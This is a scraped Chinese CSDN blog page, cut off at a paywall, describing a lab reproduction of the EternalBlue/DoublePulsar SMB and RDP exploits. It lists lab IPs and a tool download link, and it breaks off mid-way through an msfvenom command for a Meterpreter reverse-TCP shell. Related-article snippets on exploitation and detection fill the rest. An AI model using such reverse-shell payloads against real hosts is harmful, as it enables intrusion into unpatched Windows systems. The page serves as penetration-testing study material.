E+D:eternalblue+Doublepulsar

最新推荐文章于 2024-01-11 17:03:31 发布
最新推荐文章于 2024-01-11 17:03:31 发布
阅读量820 收藏
点赞数
分类专栏: tools 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Amdy_amdy/article/details/82852737
版权

靶机:192.168.6.39(windows server 2008 与windows 7测试过,没有问题)

攻击机:192.168.6.42

参考链接

http://www.duorenwei.com/news/5316.html

https://www.t00ls.net/viewthread.php?tid=39343&highlight=%E6%96%B9%E7%A8%8B%E5%BC%8F

工具的下载地址:http://pan.baidu.com/s/1dEYJQaH   密码:v5cj

 

 

利用说明:

本次实验首先执行脚本攻击,对目标IP、端口、系统版本等进行设置,接下来生成恶意的dll文件,并使用脚本加载它,最终达到实验目的。

 

主要是针对windows主机的SMB、RDP协议进行攻击,因为我主要根据他们提供的payload的程序,利用这两个模块eternalblue和Doublepulsar可以对攻击smb和rdp协议

 

在pentestbox下运行

1、实现交互端口

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost&#

最低0.47元/天 解锁文章
cacheyu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
探秘DoublePulsar检测脚本:保障网络安全的新武器
gitblog_00042的博客
04-11 389
探秘DoublePulsar检测脚本:保障网络安全的新武器 项目地址:https://gitcode.com/countercept/doublepulsar-detection-script 项目简介 双脉冲星检测脚本是一个开源项目,由Countercept团队开发并维护。它的主要目标是帮助网络安全专业人员检测和识别著名的NSA(美国国家安全局)黑客工具“DoublePulsar”植入。 Dou...
【漏洞利用】使用永恒之蓝的双倍脉冲模块(Eternalblue_doublepulsar)渗透攻击Win_7 32位主机
ATree的博客
12-20 1万+
使用这个模块本来是用来做攻击测试的,但是我始终没有测试成功,我大概花了1天半的时间,一直在研究为什么网上的文章里都显示测试成功了,我的就没有成功,一直在找原因,因为除了时间上的差异,kali模块增多,高版本的wine32软件,我真的不知道到底问题出在哪里了,就真的只好从这些方面入手去排查,从问题出发找原因,这个真的需要耐心,毅力。 我写的详细些,大家也就看的明白,这样就能保证你一次成功的概率比较...
eternalblue_doublepulsar
11-25
这才是最纯正的eternalblue_doublepulsar!!!!!!!
Eternalblue-Doublepulsar-Metasploit-master
05-11
Eternalblue-Doublepulsar-Metasploit-master
NSA泄露的恶意软件DoublePulsar感染了数万台Windows电脑
weixin_33730836的博客
09-19 952
本文讲的是NSA泄露的恶意软件DoublePulsar感染了数万台Windows电脑, 安全研究人员认为,世界各地的脚本小子和在线犯罪分子正在利用Shadow Brokers 黑客组织上周泄露的NSA黑客工具,致使全球数十万台Windows计算机正面临网络攻击威胁。 上周,被称为“Shadow Brokers”的神秘黑客组织泄露了一套据称是属于NSA“...
doublepulsar-detection-script脚本:用于扫描网络以查找受DOUBLEPULSAR植入物危害的Windows系统的python2脚本
02-20
作者:卢克·詹宁斯( @countercept.com-@jukelennings) 公司:Countercept(@countercept) 网站: : 一组python2脚本,用于清除影子代理发布的DOUBLEPULSAR植入物的SMB和RDP版本的IP列表。 支持单线程IP检查,并支持多线程文件中的IP列表。 SMB版本还支持对植入物进行远程卸载以进行补救,这是通过了解@ zerosum0x0反转的操作码机制而获得的。 这是一个较早发布的版本,其目的是允许人们在网络上找到折衷方案,因为这些漏洞在无处不在,并且毫无疑问地被用于针对组织。 它重新实现植入物的ping命令,可以在不进行身份验证的情况下远程使用该命令,以确定系统是否被感染。 支持植入物的SMB和RDP版本。 并非所有操作系统版本都经过测试,并且某些当前无法通过。 例如,2012将拒绝带有ACCESS_DENI
Eternalblue-Doublepulsar-Metasploit:利用漏洞Eternalblue-Doublepulsar的Metasploit模块
05-02
永恒的蓝色-双脉冲星-元宝 本软件按“原样”提供,不提供任何形式的明示或暗示担保,包括但不限于对适销性,特定目的的适用性和非侵权性的担保。 无论是由于软件,使用或其他方式产生的,与之有关或与之有关的合同,...
EternalBlueC:EternalBlue套件在CC ++中进行了重新制作,其中包括
03-06
EternalBlue套件在C / C ++中进行了重新制作,其中包括:MS17-010 Exploit,EternalBlue / MS17-010漏洞检测器,DoublePulsar检测器以及DoublePulsar UploadDLL和Shellcode。 2021年更新:现在包括实验性Metasploit...
eternalblue原理
11-25
关于eternalblue原理的详解,写得详细,对于理解此技术很有帮助
doublepulsar-detection-script-master.zip
09-24
doublepulsar-detection-script-master.zip:doublepulsar后门检测脚本
解决win7嵌入式系统无法DoublePulsar问题
qq_32660043的博客
01-29 264
渗透过程中总是会遇到千奇百怪的问题,解决问题,并成功控制目标,是我们的首要任务。
EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
m0_73734159的博客
12-26 5814
2017年永恒之蓝漏洞,编号为ms17漏洞。现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!
MS17-010永恒之蓝漏洞利用(windows7 32位)
最新发布
逍遥小哥的博客
01-11 627
第二步:把Eternalblue-Doublepulsar-Metasploit文件中的eternalblue_doublepulsar.rb 拷贝到/usr/share/metasploit-framework/modules/exploits/windows/smb。sudo dpkg --add-architecture i386 (开启 32 位架构支持)sudo apt install --install-recommends wine 安装。然后安装win 32架构。接下来开始用msf来打。
Metasploit渗透测试(双脉冲星)
Aluxian_的博客
04-21 1636
MS17-010(EternalBlue) 靶机:win7:service Pack1 172.16.5.201 靶机下载 攻击机:kali 172.16.5.158 而且要保证两台机器之间可以ping通 因为kali里面没有这个rb源代码 所以我们要把这个模块导入进去 我们先要smb模块下载到这里面 #cd /usr/share/metasploit-framework/modules/exploits/windows/smb #https://github.com/1stPeak/Eternalb
java 中的socket_Java中的Socket的用法
weixin_35056701的博客
02-16 451
Java中的Socket的用法Java中的Socket分為普通的Socket和NioSocket。普通Socket的用法Java中的網絡通信時通過Socket實現的,Socket分為ServerSocket和Socket兩大類,ServerSocket用於服務器端,可以通過accept方法監聽請求,監聽請求后返回Socket,Socket用於完成具體數據傳輸,客戶端也可以使用Socket發起請求並...
使用msfconsole常见问题解决
Amdy_amdy的博客
08-23 1万+
问题总结: (其中有我遇到的问题,有我没有遇到的,但我这里总结了一下别人遇到的,未雨绸缪)问题一(这个我也遇到过,不过我安装了上面的win 32就没问题了):原因:这个因为没有/root/.wine目录,执行以下命令即可创建该目录 wine cmd.exe 问题二(我没有遇到):原因:wine在使用过程中会出现图形化界面,这就需要这个基于Mozilla的Gecko渲染引擎来呈现,手动安装所需版本的wine-gecko即可。我们首先下载Wine提供的MSI二进制文件,请注意下载32位版本的,因为我
方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记
热门推荐
captain51的博客
04-16 1万+
ETERNALBLUE :是一个0day RCE漏洞利用,影响最新的Windows 2008 R2 SERVER VIA SMB和NBT,利用SMB漏洞,攻击开放445端口的windows机器
EternalBlue漏洞复现
06-12
复现EternalBlue漏洞需要满足以下条件: 1. 目标机器必须是运行Windows XP至Windows Server 2012的系统,并且未安装相关补丁。 2. 目标机器开放了TCP端口445,并且RPC服务运行在这个端口上。 下面是EternalBlue...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值